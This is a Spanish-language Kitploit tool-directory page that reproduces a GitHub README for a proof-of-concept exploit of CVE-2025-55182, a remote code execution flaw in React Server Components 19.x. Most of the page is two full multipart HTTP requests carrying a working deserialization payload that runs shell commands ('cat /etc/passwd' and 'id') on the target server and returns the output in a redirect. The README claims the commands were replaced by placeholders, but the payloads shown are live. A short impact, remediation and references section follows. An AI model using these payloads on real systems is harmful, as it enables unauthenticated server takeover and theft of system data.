Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell_Rce-cve-2025-55182 — Las versiones 19.0.0, 19.1.0, 19.1.1 y 19.2.0 de React Server Components, incluyendo react-server-dom-parcel, react-server-dom-turbopack y react-server-dom-webpack, contienen una vulnerabilidad de ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/muhammadwaseem29/react2shell_rce-cve-2025-55182
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubmuhammadwaseem29/react2shell_rce-cve-2025-55182

React2Shell_Rce-cve-2025-55182

Las versiones 19.0.0, 19.1.0, 19.1.1 y 19.2.0 de React Server Components, incluyendo react-server-dom-parcel, react-server-dom-turbopack y react-server-dom-webpack, contienen una vulnerabilidad de ejecución remota de código.

Ver RepositorioSitio web
323hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

React Server Components RCE – README

¡Buen día! De verdad espero que todo sea increíble de tu lado de la pantalla. 😊✨

Descripción

Las versiones 19.0.0, 19.1.0, 19.1.1 y 19.2.0 de React Server Components, incluidas react-server-dom-parcel, react-server-dom-turbopack y react-server-dom-webpack, contienen una vulnerabilidad de ejecución remota de código.

El problema se desencadena por una deserialización insegura de cargas útiles controladas por el atacante enviadas a los endpoints de Server Function.


PoC – Solicitud completa (saneada)

A continuación se muestra la solicitud HTTP completa que demuestra la vulnerabilidad, con los comandos sensibles reemplazados por marcadores de posición. Reemplaza con el host de tu objetivo.

redacted.com
root@kitploit:~
POST / HTTP/1.1
Host: redacted.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Captura de pantalla 2025-12-06 a las 11 49 57 PM

Comando id

root@kitploit:~
POST / HTTP/1.1
Host: redecated.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
Captura de pantalla 2025-12-06 a las 11 55 21 PM

Resumen del PoC:

  • El servidor deserializa cargas útiles estructuradas de la solicitud multipart.
  • La deserialización insegura permite a un atacante influir en el flujo de ejecución.
  • Los comandos sensibles se han reemplazado por marcadores de posición por seguridad.

Impacto

Los atacantes no autenticados pueden ejecutar código arbitrario de forma remota, lo que podría conducir a un compromiso total del sistema.


Remediación

Actualiza a la última versión de React Server Components en la que se hayan corregido las rutas de deserialización inseguras.


Referencias

  • https://github.com/assetnote/react2shell-scanner
  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
  • https://www.facebook.com/security/advisories/cve-2025-55182
  • http://www.openwall.com/lists/oss-security/2025/12/03/4
  • https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp
  • https://vercel.com/changelog/cve-2025-55182

Que estés bien de tu lado de la pantalla :) ✨❤️


Descargar herramienta